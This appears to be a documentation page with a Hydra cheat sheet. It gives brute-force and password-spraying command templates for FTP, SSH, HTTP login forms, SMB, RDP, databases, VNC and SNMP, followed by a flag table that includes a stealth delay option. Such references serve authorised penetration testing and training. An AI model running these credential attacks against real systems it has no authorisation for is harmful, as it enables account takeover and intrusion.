Brute-Force / Cracking
Hydra Cheat Sheet
Brute-force templates for common protocols ordered by port: FTP, SSH, HTTP, SMB, RDP, MySQL, and more.
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
Brute-force templates for common protocols ordered by port: FTP, SSH, HTTP, SMB, RDP, MySQL, and more.
hydra -L users.txt -P passwords.txt ftp://<IP>
hydra -l anonymous -p anonymous ftp://<IP>
hydra -L users.txt -P passwords.txt ssh://<IP>
hydra -L users.txt -P passwords.txt ssh://<IP> -s 2222
hydra -L users.txt -P passwords.txt smtp://<IP>
hydra -L users.txt -P passwords.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:Invalid login"
hydra -L users.txt -P passwords.txt <IP> http-get-form "/login.php?user=^USER^&pass=^PASS^:Invalid"
hydra -L users.txt -P passwords.txt <IP> http-get /
hydra -L users.txt -P passwords.txt pop3://<IP>
hydra -L users.txt -P passwords.txt smb://<IP>
hydra -L users.txt -P passwords.txt smb://<IP> -m WORKGROUP
hydra -L users.txt -P passwords.txt imap://<IP>
hydra -L users.txt -P passwords.txt <IP> https-post-form "/login:username=^USER^&password=^PASS^:Invalid login"
hydra -L users.txt -P passwords.txt <IP> https-get-form "/login.php?user=^USER^&pass=^PASS^:Invalid"
hydra -L users.txt -P passwords.txt mysql://<IP>
hydra -L users.txt -P passwords.txt rdp://<IP>
hydra -L users.txt -P passwords.txt rdp://<IP> -m DOMAIN
hydra -L users.txt -P passwords.txt postgres://<IP>
hydra -P passwords.txt vnc://<IP>
hydra -P community.txt snmp://<IP>
| Parameter | Example | Description |
|---|---|---|
-l | -l admin | Attack only one user |
-L | -L users.txt | Multiple usernames |
-p | -p password123 | One password |
-P | -P rockyou.txt | Password wordlist |
-C | -C creds.txt | username:password combos |
-u | -u | Loop passwords first: try each password against all users before the next password (spray order). Default (no -u) finishes all passwords for one user first |
-e nsr | -e nsr | Try null / same / reversed password |
-t | -t 16 | Parallel connections (speed) |
-s | -s 2222 | Custom port |
-S | -S | Use SSL/TLS |
-v | -v | Show attempts |
-V | -V | Show every credential tested |
-f | -f | Stop after first valid login |
-o | -o found.txt | Save results |
-R | -R | Resume attack |
-I | -I | Ignore restore file |
-w | -w 5 | Server response timeout |
-W | -W 1 | Delay between attempts (stealth) |
-M | -M targets.txt | Multiple targets |
-m | -m | Extra module options |
-U | hydra -U ssh | Show module help |